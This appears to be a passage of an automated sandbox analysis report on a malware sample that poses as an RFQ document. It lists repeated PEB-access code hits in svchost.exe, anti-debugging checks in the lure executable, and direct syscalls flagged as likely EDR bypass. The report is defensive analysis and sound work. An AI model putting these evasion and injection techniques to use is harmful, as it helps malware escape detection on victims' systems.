            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA49A mov eax, dword ptr fs:[00000030h]1_2_039EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039644B0 mov ecx, dword ptr fs:[00000030h]1_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BA4B0 mov eax, dword ptr fs:[00000030h]1_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039364AB mov eax, dword ptr fs:[00000030h]1_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039304E5 mov ecx, dword ptr fs:[00000030h]1_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C427 mov eax, dword ptr fs:[00000030h]1_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA456 mov eax, dword ptr fs:[00000030h]1_2_039EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392645D mov eax, dword ptr fs:[00000030h]1_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395245A mov eax, dword ptr fs:[00000030h]1_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC460 mov ecx, dword ptr fs:[00000030h]1_2_039BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]1_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]1_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEBD0 mov eax, dword ptr fs:[00000030h]1_2_039DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EBFC mov eax, dword ptr fs:[00000030h]1_2_0395EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCBF0 mov eax, dword ptr fs:[00000030h]1_2_039BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04B00 mov eax, dword ptr fs:[00000030h]1_2_03A04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928B50 mov eax, dword ptr fs:[00000030h]1_2_03928B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEB50 mov eax, dword ptr fs:[00000030h]1_2_039DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]1_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]1_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB40 mov eax, dword ptr fs:[00000030h]1_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8B42 mov eax, dword ptr fs:[00000030h]1_2_039D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CB7E mov eax, dword ptr fs:[00000030h]1_2_0392CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]1_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]1_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]1_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]1_2_03A02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968A90 mov edx, dword ptr fs:[00000030h]1_2_03968A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04A80 mov eax, dword ptr fs:[00000030h]1_2_03A04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986AA4 mov eax, dword ptr fs:[00000030h]1_2_03986AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AD0 mov eax, dword ptr fs:[00000030h]1_2_03930AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCA11 mov eax, dword ptr fs:[00000030h]1_2_039BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA24 mov eax, dword ptr fs:[00000030h]1_2_0396CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EA2E mov eax, dword ptr fs:[00000030h]1_2_0395EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEA60 mov eax, dword ptr fs:[00000030h]1_2_039DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov esi, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]1_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]1_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039649D0 mov eax, dword ptr fs:[00000030h]1_2_039649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA9D3 mov eax, dword ptr fs:[00000030h]1_2_039FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C69C0 mov eax, dword ptr fs:[00000030h]1_2_039C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]1_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]1_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE9E0 mov eax, dword ptr fs:[00000030h]1_2_039BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC912 mov eax, dword ptr fs:[00000030h]1_2_039BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]1_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]1_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]1_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]1_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B892A mov eax, dword ptr fs:[00000030h]1_2_039B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C892B mov eax, dword ptr fs:[00000030h]1_2_039C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0946 mov eax, dword ptr fs:[00000030h]1_2_039B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04940 mov eax, dword ptr fs:[00000030h]1_2_03A04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]1_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]1_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC97C mov eax, dword ptr fs:[00000030h]1_2_039BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov edx, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC89D mov eax, dword ptr fs:[00000030h]1_2_039BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930887 mov eax, dword ptr fs:[00000030h]1_2_03930887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E8C0 mov eax, dword ptr fs:[00000030h]1_2_0395E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A008C0 mov eax, dword ptr fs:[00000030h]1_2_03A008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]1_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]1_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA8E4 mov eax, dword ptr fs:[00000030h]1_2_039FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC810 mov eax, dword ptr fs:[00000030h]1_2_039BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov ecx, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
